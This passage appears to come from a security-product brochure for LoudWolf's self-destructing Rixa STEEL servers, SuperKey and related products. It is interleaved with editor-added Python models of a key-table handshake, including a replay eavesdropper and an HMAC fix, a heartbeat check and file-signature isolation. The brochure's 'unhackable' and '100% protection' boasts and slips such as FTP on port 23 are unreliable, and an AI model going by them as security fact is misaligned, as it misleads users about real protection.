index. Trust is granted by asking the device for the value of a particular key, i.e. “what does key 173 hold?”
If the result is the same as the asking machine’s, trust is granted. It also generates PGP public/private keys
using the results from the key database. This external device is connected to the machine via a serial
interface. [For further information see page: ]
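The key-table exchange as described for the Hewlett Packard Sentinel, beside a hardened variant, as an added example that is not the product’s code. The document says only that the asker names an index and trusts the device if the returned value matches its own; key provisioning is not described, so the table here is derived from a fixed demo seed (an assumption). The hardened version, an HMAC over the index and a fresh nonce, is this editor’s addition and not a feature the document claims. The point it makes is the caveat a practitioner would raise: returning the raw key value hands that key to whoever is listening on the serial line, so a recording of one exchange answers the same question for ever after.

```python
"""Key-table challenge/response: as described, and with a nonce + HMAC.

Added example, not the product's code. Key provisioning is an assumption.
"""
import hashlib
import hmac
import secrets

TABLE_SIZE = 256


def make_key_table(seed):
    """Demo provisioning: key_i = SHA-256(seed || i). Both genuine devices
    receive the same table, standing in for whatever the product does."""
    return [hashlib.sha256(seed + i.to_bytes(2, "big")).digest()
            for i in range(TABLE_SIZE)]


def _mac(key, index, nonce):
    """Proof of possession of key[index] bound to this nonce."""
    return hmac.new(key, index.to_bytes(2, "big") + nonce, hashlib.sha256).digest()


class Device:
    """A device holding the shared key table."""

    def __init__(self, table):
        self.table = table

    def answer_naive(self, index):
        """Protocol as described: the raw key leaves the device."""
        return self.table[index]

    def answer_hmac(self, index, nonce):
        """Hardened: prove possession of key[index] without revealing it."""
        return _mac(self.table[index], index, nonce)


class Eavesdropper:
    """Has no key table, only a transcript of exchanges it watched, and
    answers later challenges by replaying what it saw."""

    def __init__(self):
        self.seen_naive = {}
        self.seen_hmac = {}

    def answer_naive(self, index):
        return self.seen_naive.get(index, bytes(32))

    def answer_hmac(self, index, nonce):
        return self.seen_hmac.get((index, nonce), bytes(32))


def naive_trust(asker, responder, index, eve=None):
    """Asker: 'what does key <index> hold?' Trust if the answer matches.
    If an eavesdropper is on the line it records the exchange."""
    response = responder.answer_naive(index)
    if eve is not None:
        eve.seen_naive[index] = response
    return hmac.compare_digest(response, asker.table[index])


def hmac_trust(asker, responder, index, eve=None, nonce=None):
    """Asker sends (index, fresh nonce); responder returns an HMAC over both.
    A recorded answer is useless against a different nonce."""
    nonce = secrets.token_bytes(16) if nonce is None else nonce
    response = responder.answer_hmac(index, nonce)
    if eve is not None:
        eve.seen_hmac[(index, nonce)] = response
    return hmac.compare_digest(response, _mac(asker.table[index], index, nonce))


def demo():
    """Returns (genuine passes naive, replay passes naive,
                genuine passes hmac, replay passes hmac)."""
    table = make_key_table(b"demo-seed-not-a-real-secret")
    asker, genuine, eve = Device(table), Device(table), Eavesdropper()
    return (
        naive_trust(asker, genuine, 173, eve),   # genuine device passes
        naive_trust(asker, eve, 173),            # replay of key 173 passes too
        hmac_trust(asker, genuine, 173, eve),    # genuine device passes
        hmac_trust(asker, eve, 173),             # fresh nonce: replay fails
    )


if __name__ == "__main__":
    print(demo())
```

Two limits remain even with the HMAC form. The nonce must be fresh every time (reusing one reinstates the replay), and the exchange only proves possession of the table: a machine whose table has been copied, which is exactly the “I just steal the keys” problem raised earlier in this document, passes as readily as the genuine one.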
Rixa STEEL-XA
Aimed at commercial, government or military organizations that require the ultimate in data protection.
This server product will even go as far as destroying the physical medium holding the data if a high enough
risk is perceived. The Rixa STEEL is an integration of most of the other technologies mentioned here, with a
number of added features, making a highly secure system. The system configuration can range from a
simple single server to a server farm. The machines use a novel ‘Tri-Level Operating System’: three
independently written operating systems, each with 100 modules. At boot a random selection of the required
modules is loaded to produce the operating system. This makes the system unpredictable and thus very
hard to attack through any particular module. The system is self-checking, to the point of even checking
low-level hardware operations on the motherboard, and is thus highly integrated. If an attack is sensed, a
hard-coded decision is made as to what action is taken, which can range from stopping access to an interface
(serial, network) to the complete shutdown of the machine and destruction of the hard drives. The system
also only sends or receives a packet deliberately: it does not reply by default to any incoming packet, as
normal networking does. This stops information leakage such as which type of web server is in use, other
server version details, or anything else that could tell a hacker what the server is. An intelligent
denial-of-service system is also incorporated, which stops an attack that manages to take one machine down
from taking any other in the farm down. [For further information see page: ]
Sharp STEEL
As with the ‘Sentinel Sharp’, this is the same type of product but developed for the ‘Rixa STEEL’ systems.
[For further information see page: ]
HVIP Drive
Aimed at the OEM market, for organizations that require the ability to destroy the physical disk medium
holding the data. The HVIP drive is a ‘High Value Intellectual Property’ drive. The idea of this disk drive is to
physically protect the data from being read by removal of the platters from the drive so they can be read on
another drive or test rig. It can ‘near instantly’ destroy the physical medium of the data on the platters,
leaving a resulting goo. The drive has built-in intelligence by which it decides when to carry out the securing
action, e.g. case breach or power down. [For further information see page: ]
Products Overview 3 of 4
SuperKey
This is a software-based product and could be used on any system that requires this type of authentication,
from set-top boxes to satellite communications devices. SuperKey is a security system that absolutely
identifies a particular machine or device. It is not a system for identifying a user. It does not use any
password or certificate technology. It is based on shared secrets, built up by the authenticating process from
such things as the fan speed at a particular time, the difference between the PC’s clock and GMT, or the serial
number of a piece of software or hardware. Such technology might be used in set-top boxes to ensure the box
receiving the data (movie) is trusted. [For further information see page: ]
Avenger Pro
This software security product is aimed at the commercial, government, military and home PC markets.
Avenger Pro is an anti-virus and process-trust software solution. It not only provides virus protection but
also ensures that the processes running on your PC are known and trusted. The ‘normal’ updates from the
Internet will be needed to keep its definitions current, so the SuperKey technology is also incorporated to
ensure that any virus/process definitions come from a trusted source. This stops hackers from spoofing
anti-virus definition download sites. The SuperKey technology embedded in this software could also be used
by third-party software vendors to authenticate that the site you are downloading from is valid. For this to
occur, a module is also required on the third-party site to implement the server side of the key trust
mechanism. [For further information see page: ]
Avenger Platinum
Avenger Platinum has the same base functionality as the Pro product with the addition of a hardware
interface to the Sentinel product. This allows any untrusted event to cause an action to be taken dependent
on its severity. As with the Sentinel product, the rules are hard-coded and cannot be changed, and thus are
not hackable. The actions it takes range from stopping access to an interface (serial, network) to the
complete shutdown of the machine. [For further information see page: ]
Hot ROD (Read Only Drive)
This secure disk drive product is aimed at either the OEM market or the after-market; it could also be
licensed to drive manufacturers. The ‘Hot ROD’ set of products are all based around the same low-level
hardware. This hardware consists of a disk drive with a form of write protection implemented via a hardware
switch on the front panel of the computer. The portion of the drive to be protected can also be selected by a
physical switch. These options cannot be changed via software, as that would open them to being hacked and
thus render them useless. LoudWolf plans variations of this product including 50, 100, 150, 250 and 500
gigabyte capacity drives. [For further information see page: ]
Dual Hot ROD
This hard disk security product is aimed mainly at the military, as they require this type of fault-tolerant disk
coupling. This product is a very tight form of mirroring: there are two drives, very tightly coupled, one the
exact mirror of the other. If one fails, the other continues to operate. They are not hot-swappable, and thus
repair requires replacement of both. [For further information see page: ]
Products Overview 4 of 4
Hot ROD Raid
Whereas the ‘Dual Hot ROD’ product is aimed at the military market, this product is aimed at the
commercial market, where easily administered fault tolerant disk arrays are required.
RAID functionality, i.e. hot swap followed by re-syncing, requires a much more complex solution than
the ‘Dual Hot ROD’, as ‘non-writeable’ data has to be written. The solution is to have a complete
subsystem that runs independently of the main computer, with its own RAID control functionality. [For
further information see page:
]
Silicon Server
The ‘Silicon Server’ is a hardware and software secure server solution. It is aimed at organizations
that require a secure, non-changing or very infrequently changing content scenario, such as web
servers and image servers. The secure content will be held in a medium that is only writable by
physical access to the server. This would operate in the same way as the ‘Hot Rod’ product: a physical
switch will have to be operated to allow write access to the secure ‘read only’ areas. Initially the
server would use the ‘Hot Rod’ family of products, but an upgrade path to a fully silicon (solid state)
drive, which would yield much higher performance, is also being considered. [For further information
see page:
]
Rixa STEEL-XA Secure servers for high value Intellectual Property.
“The Rixa STEEL system is designed to provide 100% protection for the high-value intellectual property
it contains while at the same time providing 99.999% uptime for the customers it serves.”
These two goals are met by the interaction of a suite of technologies which, when considered as a system,
create a logical and harmonious relationship between these two opposing forces.
DESIGN AXIOMS:
Prevention of “catastrophic” Intellectual Property (IP) loss is the overriding concern and takes
precedence over all other factors, including continuity of service.
All other systems rely on the “antiviral approach” to system integrity, allowing all data in and
blocking that which is recognized as harmful. Rixa takes the opposite approach: we allow nothing in
unless it is certified as non-harmful.
Bullet point features:
• 12-way self-checking software system with a simple and rugged design philosophy.
• Unhackable hardware override of all software systems.
• Last resort, ultimate peril, total destruction of the hard disk drive by means of a high-speed
chemical reagent.
• One-way inputs and outputs for all data transfer (zero information leakage).
• No execution of external code within the server whatsoever; input buffers checked via hardware
for “no harm” validity.
• High reliability components with active thermally controlled environments.
• Prevention of multiple successful attacks by shared data “watcher” system.
• Unknown software configuration due to on-power-up self-configuration.
• Super-Key system with zero knowledge key spans.
• Zero knowledge previously-shared secret technology.
• Smart sensor technology with weighted threat analysis all in hardware.
• Designed and built in the open – right in the face of, and despite, those who would see this
technology buried. Pre-tested!
Rixa STEEL-XA Product Description
The Rixa STEEL-XA Concept
The sensor and checking systems described are formidable when considered as an integrated system;
the erasure response is a requirement for the 100% goal, as can plainly be seen. However, not all
threats are considered equal. There are two stages to an alert, dependent on the severity of the
threat, namely a caution cut-off closedown, which is locally reversible, and full erasure, which
requires a more elaborate recovery procedure.
Caution cut-off closedown Recovery
The caution cut-off closedown of a Rixa server is generated by any failure of the watcher systems to
filter a non-standard request for intellectual property. As a precaution, any imperfect request for
service will close off the Rixa server by means of a hardware cut-off that effectively isolates the
server from all connections. An electronic “pair of scissors” cuts both the input and output data ports
to the server. Recovery consists of a three-way re-authorization: from the local security officer, a
one-time ‘Super-key’ code from DA (issued only after data from the watcher has been verified) and
another ‘Super-key’ from the local watcher (verified by the watcher network).
Full Erasure Recovery
This is a more complex arrangement that requires the complete restore of the intellectual property that
has been erased beyond all possible recovery by the Rixa STEEL protection systems. In this case, the
restore procedure requires the installation of a new factory-prepared hard disk drive, along with an
elaborate re-start procedure.
[Figure: the innards of a prototype hard disk complete erasure system. Top right is a solenoid which is
prevented from breaking a glass ampoule (right edge) by the constant reminders NOT to self-destruct from
the tri-level software system and the heartbeat system; other sensors in the Rixa STEEL chassis add an
extra level of protection, preventing removal of the drive without triggering a self-destruct event.]
Installation Security
The Rixa Server will only power up one time, ever. The drives containing the protected property are
self-protecting from the beginning and they remain self-protecting until either a failed attack or a
hardware failure terminates their duty.
The drive core is the last line of defense and is treated with the same “overkill” philosophy as the rest
of the Rixa STEEL system. The drive will self-configure its own cryptographic Super-Keys and is incapable
of divulging them, since it itself does not know what the keys are! The same is true of the software
configuration, which is determined on power up by a random key generated from quantum noise, which is
then automatically overwritten by the software it configures. Immediately after the software starts, the
server is configured, yes, but with what configuration? The server itself knows not, nor do we! If a
situation should ever occur where the customer loses the original, we cannot help.
[Figure: the main hardware microcontroller behind many of our products, including Sentinel, RIXA STEEL,
Sharp, HOT-ROD and RIXA-XA systems. The device is fairly flexible and may be adapted to many products
easily. It is able to query sensors, cut connections, isolate hard drives, analyze incoming data requests,
verify software integrity and even destroy the hard drives physically. Of course it is itself NOT
programmable or hack-able. PERIOD.]
Internal Security at LoudWolf
Incoming raw or encrypted data must be physically secured by, and for, the satisfaction of the customer. We
take full responsibility only when the property is transferred to our secure drives. And once there, as you
have already guessed, we are not too worried about it! The system allows for the protected property to be
loaded at the client’s site. In this case LW takes on responsibility for the IP at the moment that the safety
devices are removed and the protection system is armed.
Port Level Security
The first step for any hacker is to locate the system they are trying to hack. Probes and IP scanners can
determine if a server is on and what ports are active on the server. The Rixa server has only one input that
only listens and never replies and one output that only sends and never receives. It is incapable of giving
feedback to probes. What happens when you “Ping” a RIXA server? Nothing… Silence… Like it was not even
there!
Service Level Security
The second step for the hacker is to find out what kind of system they are trying to hack. Probes are
used to ID the system, to determine what the operating system is and what programs and services may be
running on the target system. For example, if the hacker tries an anonymous log-in on FTP port 23, a
typical server may reply “Access denied: Microsoft FTP IIS 5.0”. Then they can try a known vulnerability
targeted to that program. This is termed “information leakage”. The Rixa STEEL system reveals nothing of
its internal structure to probes, since all “information leakage” has been compiled out of its operating
systems.
Configuration Security
The Rixa STEEL approach to configuration security is to make it nothing less than impossible to know how
any particular server is configured. Knowing the configuration and hoping to keep the secret safe is not good
enough. The goal in configuration security is similar to the problem faced by the designers of the U.S.
President’s, “launch code.” How do you develop something in such a way as to be totally secure-even from
an “insider?” The Rixa STEEL operating system is in fact three custom operating systems running
concurrently. The operating systems are each compiled by LoudWolf engineers in concise modules, one
hundred modules per operating system. These modules are designed to be interchangeable. Each operating
system is developed by a separate programming team at LoudWolf. Each team produces, as part of their
design specifications, 100 different variations of their modules.
When a Rixa STEEL server is installed the server self configures its software by randomly selecting the
modules to form its operating system. Nobody can know just which combination of 100 x 100 x 100 or one
million possibilities was selected. In short, just what is running on a particular server is not known by
anyone. Even us!
Operating System Integrity
The Rixa STEEL operating system is a hybrid of three custom operating systems and a custom hardware
circuit. The Rixa hardware checks the software heuristically in over 100 ways, including a byte-for-byte
comparison with non-volatile read-only media, while the tri-level software checks itself and the hardware
constantly. The Rixa tri-level software will trip a 200-nanosecond hardware fuse on all inputs and
outputs if 12-way perfection is not verified, or if even one bit of input data is not as it should be.
Physical Security
The Rixa STEEL server is fail-safe. Any failure, including power failure, physical damage or indeed any
unusual circumstance, will by default, inevitably and without further action, prevent the IP theft by
taking the IP off-line or, in the worst case, erasing the IP completely, and on our military version,
brutally. Rixa software and hardware checking acts as a restraint mechanism that holds back the erasure
of the high value IP. This erasure process will activate using fundamental forces if not prevented from
doing so by a perfectly functioning Rixa security system.
Hardware beats software.
The custom hardware is an important concept in the overall Rixa methodology. At LoudWolf we say,
“scissors beats software any day!” Akin to the rock-paper-scissors game we played as children, it is an
overriding truth that if I cut the wire you will not be able to pass a signal through it. Similarly, the
hardware, since it contains no microprocessor and no memory and therefore is not programmable or
hack-able, adds an overriding non-software layer of security. Nevertheless, in order to protect it must
be running. Just as each software layer cross-checks the other two layers of software, each of the three
layers of software cross-checks the hardware. Just as the hardware is measuring digital and analog
signals generated by the software, the software is in turn taking note of the hardware health by constant
monitoring of the heartbeat and other “health signals.”
Heartbeat Detail
The heartbeat is a complex electronic waveform generated by the hardware. It consists of a complex
interplay of several signal sources. Most basic is a “carrier frequency” which can vary in the ultrasonic
range from 25 to 45 kilohertz. Superimposed upon this carrier frequency is an amplitude-modulated signal
that consists of variable mark-space ratio data with a periodicity which can vary from 10 microseconds to
up to half a second, in ten microsecond increments. The periodic measurement by the software of this
complex hardware signal produces variables by which the software verifies that the hardware is
functioning correctly and therefore the system is fully protected.
In turn, it is the software itself which determines the hardware’s carrier frequency, mark-space ratio
and data stream, thus creating a circle of software-hardware interaction that ensures that both the
hardware and software are fully functional and the system is completely secure. Should the hardware
detect any slight variance in the subtle “music” of the generated heartbeat, as would be caused by the
slightest variation in the software functions, it will trigger an alert. Similarly, should the hardware
fail to accurately produce its own complex “music”, the software will trigger an alert.
Carrier frequency    25-45 kHz
Mark-space ratio     10 µs - 500 ms
Data stream          8 x 8 bit bytes = 64 bits
In a “tour de force” of convoluted logic, our scientist boffins derive the base seed numbers that determine
the frequency pattern of the heartbeat from an integration of the data derived by the hardware’s current
status! A house of cards indeed, but an exquisitely sensitive system is, after all, what we are after.
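The heartbeat loop described above, modelled as an added example that is not LoudWolf's code: both sides derive the carrier, period and 64-bit data for each epoch from a shared seed, the software compares what the hardware emitted against expectation, and the measured status is folded into the next seed, closing the circle. HMAC-SHA256 as the derivation, the tolerances and the initial seed are assumptions; the page does not disclose its own derivation.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Parameter ranges taken from the heartbeat table on this page.
CARRIER_MIN_HZ, CARRIER_MAX_HZ = 25_000, 45_000   # ultrasonic carrier
PERIOD_STEP_US = 10                               # ten-microsecond increments
PERIOD_MAX_US = 500_000                           # up to half a second
DATA_BYTES = 8                                    # 8 x 8-bit bytes = 64 bits


@dataclass(frozen=True)
class Heartbeat:
    carrier_hz: int
    period_us: int
    data: bytes


def derive_heartbeat(seed, epoch):
    """Expected heartbeat for one epoch, derived from the shared seed.
    Hypothetical derivation: HMAC-SHA256 stands in for the undisclosed one."""
    digest = hmac.new(seed, epoch.to_bytes(8, "big"), hashlib.sha256).digest()
    span = CARRIER_MAX_HZ - CARRIER_MIN_HZ + 1
    carrier = CARRIER_MIN_HZ + int.from_bytes(digest[0:4], "big") % span
    steps = 1 + int.from_bytes(digest[4:8], "big") % (PERIOD_MAX_US // PERIOD_STEP_US)
    return Heartbeat(carrier, steps * PERIOD_STEP_US, digest[8:8 + DATA_BYTES])


def next_seed(seed, measured):
    """Fold the measured hardware status into the next seed, so the next
    epoch's expectation depends on what the hardware actually produced."""
    status = (measured.carrier_hz.to_bytes(4, "big")
              + measured.period_us.to_bytes(4, "big") + measured.data)
    return hashlib.sha256(seed + status).digest()


def verify_heartbeat(expected, measured, carrier_tol_hz=50, period_tol_us=PERIOD_STEP_US):
    """Return the list of heartbeat components that deviate from expectation.
    Tolerances are assumed values, not taken from the page."""
    faults = []
    if abs(expected.carrier_hz - measured.carrier_hz) > carrier_tol_hz:
        faults.append("carrier")
    if abs(expected.period_us - measured.period_us) > period_tol_us:
        faults.append("period")
    if not hmac.compare_digest(expected.data, measured.data):
        faults.append("data")
    return faults


class HeartbeatGenerator:
    """Constructed stand-in for the hardware: reproduces the parameters the
    software programmed into it; drift_hz models a faulty or tampered generator."""

    def __init__(self, seed):
        self.seed = seed
        self.drift_hz = 0

    def emit(self, epoch):
        hb = derive_heartbeat(self.seed, epoch)
        return Heartbeat(hb.carrier_hz + self.drift_hz, hb.period_us, hb.data)


def monitor(cycles, drift_hz=0, drift_at=None):
    """Software side of the mutual check, run for `cycles` epochs.
    Returns (epoch at which the alert fired, faults) or (None, [])."""
    seed = b"constructed initial seed"        # constructed sample value
    hardware = HeartbeatGenerator(seed)
    for epoch in range(cycles):
        if drift_at is not None and epoch >= drift_at:
            hardware.drift_hz = drift_hz
        expected = derive_heartbeat(seed, epoch)
        measured = hardware.emit(epoch)
        faults = verify_heartbeat(expected, measured)
        if faults:
            return epoch, faults              # alert: caution cut-off closedown
        seed = next_seed(seed, measured)      # both sides advance together
        hardware.seed = seed
    return None, []
```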
Watcher Functionality Overview
The “Watcher” system is a separate component of the overall Rixa STEEL server. It can be viewed as a
firewall system, in that it functions as a filter in front of the main server and prevents “bad” data packets
from being forwarded to the server by only allowing known good packets through.
The “normal” operation of the watcher is to validate incoming data packets. However, the watcher also
performs two other essential functions:
1. Co-ordinate the sharing of watcher network bad data lists and verify the integrity of the list data.
Verify the health of the other watchers on the private watcher network.
2. Monitor the health of its attached Rixa STEEL server and co-ordinate notification and recovery
procedures in the event of any failure.
The watcher system is kept separate from the Rixa STEEL servers, since it is essential that the watchers
perform their duties as reporters and coordinators of the “post mortem” data in the event of a Rixa STEEL
SECURITY CLOSEDOWN or an EMERGENCY PROTECTION event.
The Watcher system itself incorporates many of the security features of the Rixa STEEL system and its
software is similarly configured, although since the watcher systems are not holding any protected intellectual
property, they do not incorporate the security closedown and protected property erasure systems.
Rixa STEEL-XA Product Description Variants & Options
MILITARY SERVERS
High Security Military and governmental secure servers:
Naturally, our military variant combines all of DA’s core technologies to form a “flagship” product.
The Rixa STEEL-XA secures the Protected Intellectual Property (PIP) from all possible forms of theft.
Considered in the design are the possibilities of electronic theft, physical possession (through force or
otherwise) and accidental exposure to physical possession.
The design calls for absolute confidence in the total destruction of the protected intellectual property in the
case of unauthorized physical possession of the system.
Built in to the system is the concept of fail-safe protection from all unauthorized electronic access to the
protected data.
FEATURES:
• Tri-Level software.
• Full physical sensor array.
• HPIV drives.
• Hot ROD system data integrity protection.
• SuperKey cryptography.
• Watcher subsystem.
• Sentinel Sharp security interface.
• Sentinel Avenger Pro control software.
• Silicon Server hardware data storage.
COMMERCIAL SERVERS
RIXA Commercial high value Intellectual property servers
The emphasis for our commercial clients, though security is no less crucial than for our military
customers, is on electronic protection with de-emphasis on physical security. The design paradigm
requires us to allow for the possibility that the protected property could, at times, be the only or
most up-to-date copy.
The system is priced lower than our high-end military systems, at least at the base level. The system
allows for incremental upgrades to security, and it also supports a subscription based “monitoring”
service for our corporate clients.
FEATURES:
• Tri-Level software.
• Corporate selected physical sensor array.
• Hardware protected connectivity.
• Hot ROD system data integrity protection.
• SuperKey cryptography.
• Watcher subsystem.
• Sentinel Sharp security interface.
• Sentinel Avenger Pro control software.
• Silicon Server hardware data storage.
Commercial Systems Function Definition
The industrial version of the Rixa STEEL security system draws its technology from our military systems
with design modifications suitable to accommodate non-military requirements. For example, we must
accommodate the possibility that the protected intellectual property is, at times, the only up-to-date
copy. The Rixa STEEL security system in its industrial version lacks the chemical erasure system and a
full complement of sensors. Nevertheless, with the exception of physical possession by force, the Rixa
STEEL security system affords military-grade security for the industrial consumer.
Supplementing the tri-level software system is a heuristic system that calculates signatures for all
system files and takes electronic isolation protective measures in the event that any anomaly is
detected. Therefore, the security system acts very quickly, cutting off all internet access by means of
hardware switches, preventing data loss from the moment the slightest suspicion is aroused.
Signature checking is hardware based, so it cannot be “spoofed” or faked by malicious software. Also,
since the isolation system is fail-safe hardware, it cannot be prevented from taking action, nor can
that action be reversed by software. Upon alert, the Rixa STEEL system using hardware alone can
instantly isolate the protected data from all communications channels, yet it remains capable of calling
out for assistance by phone, radio and internet.
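The signature checking described here and under Operating System Integrity (a comparison of every system file against a read-only baseline, with any anomaly tripping an isolation cut-off that software cannot reverse) can be sketched in software. This is an added example and not LoudWolf code: the file tree, the baseline manifest and the CutOff latch are constructed stand-ins, and SHA-256 is assumed as the signature function.

```python
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=65536):
    """SHA-256 of a file, streamed so large system files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Relative path -> SHA-256 for every file under root (the read-only baseline)."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def verify(root, baseline):
    """Compare the live tree against the baseline.
    Returns a sorted list of (kind, path), kind in {missing, modified, unexpected}."""
    current = build_manifest(root)
    anomalies = []
    for rel, digest in baseline.items():
        if rel not in current:
            anomalies.append(("missing", rel))
        elif current[rel] != digest:
            anomalies.append(("modified", rel))
    anomalies.extend(("unexpected", rel) for rel in current if rel not in baseline)
    return sorted(anomalies)


class CutOff:
    """Software model of the hardware isolation switch: a one-way latch.
    Once cut, only the separate recovery procedure may restore the link,
    never the software that tripped it."""

    def __init__(self):
        self.isolated = False

    def cut(self):
        self.isolated = True

    def restore(self):
        raise PermissionError("isolation cannot be reversed from software")


def check_and_act(root, baseline, cutoff):
    """Fail closed: any anomaly at all isolates the server before the findings are returned."""
    anomalies = verify(root, baseline)
    if anomalies:
        cutoff.cut()
    return anomalies


def demo():
    """Constructed scenario: baseline a small tree, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as root:
        files = {"kernel.bin": b"\x7fELF constructed kernel image",
                 "service.cfg": b"listen=only\nreply=never\n"}
        for name, content in files.items():
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(content)
        baseline = build_manifest(root)
        cutoff = CutOff()
        clean = check_and_act(root, baseline, cutoff)       # nothing amiss yet
        # Simulate the three kinds of tampering the check must catch.
        with open(os.path.join(root, "service.cfg"), "ab") as handle:
            handle.write(b"reply=always\n")                 # modified
        os.remove(os.path.join(root, "kernel.bin"))          # missing
        with open(os.path.join(root, "dropper.exe"), "wb") as handle:
            handle.write(b"constructed foreign binary")     # unexpected
        tampered = check_and_act(root, baseline, cutoff)
        return clean, tampered, cutoff.isolated
```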
Above is a graphical representation of the typical RIXA STEEL system. The Military, Industrial and
Consumer applications can all be described by elements of this diagram.
• For the military applications, the non-mobile base secure data server is represented by all aspects of
the preceding diagram.
• For mobile military applications (submarines, tanks, tactical units, etc.) the diagram is complete with
the exception of the watcher network, which is impractical and insecure for mobile units.
• For the industrial applications, the diagram is identical with the deletion of the “kill” arrows, as the
industrial application presumes physical security and assumes that the protected data may be the sole
copy.
• For the consumer applications, the diagram is to be considered without the watcher network and the
chemical erasure system. Also the tri-level software system runs “on top” of a commercial operating
system.
Consumer Systems Overall Issues
Our offerings to the consumer are, of course, derived from the high end products, though not all of the
features inherent in our high end systems can be converted for the consumer level requirements.
The marketing emphasis for our consumer products is to provide a dramatic increase in confidence in the
privacy of their data, due to our sophisticated detection and alarm systems. We have noted that there is
an aspect of “pride of ownership” that also plays a part in consumer demand.
For the consumer products we eliminate the tri-level software system, for this is not an intellectual
property server but a general-purpose computer running a popular operating system and various
application programs. As such, it is difficult to secure yet maintain the flexibility expected by the
average user. Nevertheless, utilizing our hardware signature system to ensure the integrity of the key
operating system files, the possibility of compromise by a virus, a Trojan horse program or spyware is
eliminated.
In concert with the computer manufacturer and/or the microprocessor manufacturer, we would hope to
achieve a tight integration of the computer core hardware with LoudWolf electronics. It is possible and
preferable that the LoudWolf security electronics be incorporated beside the so-called support chips,
which are manufactured by the microprocessor companies themselves and typically ship with the
microprocessor. We believe that companies such as Intel, Via and AMD would be intrigued by this
possibility, since a relationship with LoudWolf would enable one or the other to claim that computers
based upon their microprocessor are “more secure” than their competitors’.
Such a partnership would enable LoudWolf to integrate our technology closely to the microprocessor
front-side and PCI bus and would enable the security system to afford the consumer total protection.
The consumer version also can be configured to analyze and respond to a number of sensors and/or modes
of operation that go some way towards emulating the modular sensor array of our military version.
Examples of such sensors which are accessible and generally built in to modern day computers are:
microphone, infrared device, radio frequency receivers, forensic RF via USB and (IEEE1394) protocols,
power profile analysis, user schedule profile, typing signature, temperature profile, application
profile, usage patterns etc.
Main Server “STEEL” Standard Equipment
The main server is a high speed Pentium IV based computer. It is currently designed around the Intel
motherboard, though the choice of motherboard and processor is unimportant to the system as a whole. The
specifications of the standard portion of the server are as follows, though, once again, the hardware
selection for the standard portions of the system is somewhat arbitrary.
• Intel Pentium IV Processor with 4.0 GHz clock speed/800 MHz FSB speed.
• 2 GB RAM consisting of four banks of 512K double-sided RIMM Direct RAMBUS PC-800B compliant
Serial Presence Detect with Error Check Correction.
• VGA card.
• Dual-channel Gigabit I/O card.
• Data storage hard disk drives: up to 10 drives @ 120 Gigabytes for a total of 1.2 Terabytes of
data.
Main Server STEEL Custom Equipment
• Solid 3mm-thick hermetically sealed aluminum case, with a single triple-sealed input port for
12V power input.
• Three triple-sealed optical windows for optical connection to the input, output, and video
monitor.
• Power Inverter unit: 12V DC in with outputs for +5V, +12V, –12V, and 120V AC.
• Battery-backed-up un-interruptible power supply: 120V input – 120V output.
• System loaded at factory. Does not require any form of floppy disk drive or CD-ROM.
• Custom sensor package (as needed):
  • Heartbeat generator.
  • Quantum random number generator (built in to the Pentium 4 processor system).
  • Analog measurement package: 16 bit, 16 channels.
  • Digital monitoring package: 16 inputs.
  • CPU monitoring package: 80 inputs.
• Closedown package:
  • Two channel optical interrupter system (fail safe).
  • Optical fault indicator system via VGA port.
  • Passive ultra capacitor discharge/coil array disk erasure system (up to ten units).
  • Caution restore magnetic key sensor array.
• Liquid cooling system with case mounted heat sinks.
• Nitrogen atmosphere circulation system.
• Temperature control, monitoring and alarm system.
Super-Keys Product description
The Super Key system is integrated into a number of our products. It is an integral part of the hardware and
software components that make up the bulk of our offerings. The Super Key is also a “stand alone”
technology that addresses many of the cryptographic problems we face today.
The Problem.
As has been stated time and again in this document, the security of the cryptographic keys is the
weakest link in any secure system; thus systems are only as secure as the keys that are designed to
allow legitimate access to them. For the benefit of the reader, we will describe the current state of the
art and, with this as the backdrop, we will describe an approach that is designed to overcome the
current limitations.
Cryptography, or the process of encrypting computer communications, is a complex subject. Moreover, it is
essential to understand the importance of keys or passwords in the context of data encryption. To
understand our approach to encryption as incorporated into our products, it is necessary to delve a little into
the complexities of cryptography.
When we consider encrypting data, we must strike a three-way balance:
1. What is the value of the data and the consequence of its loss?
2. What is the cost of encryption in terms of computer performance and IT costs?
3. What degree of encryption is appropriate to deter the potential data thief?
Security Encryption Today
Security professionals routinely make these decisions based upon arbitrary “rules-of-thumb” or “best
practices.” Data encryption is not routinely implemented because encrypting data is associated with various
costs. Extra computing power is needed to encrypt outgoing data and still more to decrypt inbound data. In
some cases, the data is pre-encrypted and stored separately from the original requiring additional disk space.
Most importantly, the protection of the encryption keys poses a significant problem, as we will see.
Every-day Security
Inconsequential or low value data traffic is generally not encrypted at all, to preserve the performance
of the entire system. Private data with intrinsic value is generally protected with weak encryption, and
high-value intellectual property, such as high resolution digital masters of block-buster movies,
military targeting information, battle plans and military hardware design documents, is protected with
the strongest encryption available.
Vital Security
Any data that, if lost, would result in a catastrophic and permanent loss is now considered unsafe to
store on any connected computer, irrespective of the encryption or security systems installed. These
classes of data are rarely, if ever, stored on any computer system that is connected to any form of
communications network.
Unbreakable security – Isn’t
A fundamental axiom known to all security experts is that data encryption, however complex and difficult
to break, is never impossible to crack. The very best encryption techniques serve only to make the task
of decoding the message more expensive and difficult. Top grade military security encryption, despite
the claims of some suppliers, can only hope to achieve the goal of making the decoding of the
communication so prohibitively expensive and time-consuming as to make the effort not worth the trouble.
The Best Encryption Available
The top-of-the-line data encryption vendors tout their systems aggressively, using the strongest of
superlatives. However, it is worthy of note that never do these vendors claim their cryptographic systems to
be unbreakable. The boldest claim we have seen from such vendors is the phrase “computationally
infeasible.” The implication of this phrase is that a potential data thief would be forced to use the fastest and
largest computers available and commit an inordinate amount of computer time in order to compromise the
encryption. We do not dispute these claims. Strong cryptography, properly implemented is very hard to
crack… today.
The LoudWolf Way
LoudWolf makes the assertion that what was “computationally infeasible” last year is quite feasible this year
and thereafter becomes more and more trivial.
Our second assertion is simply this: A data thief when faced with a properly implemented and strongly
encrypted target has three choices:
1/ Commit computational power and expense to crack the cryptography.
2/ Give up the task and look for an easier target.
3/ Steal the key!
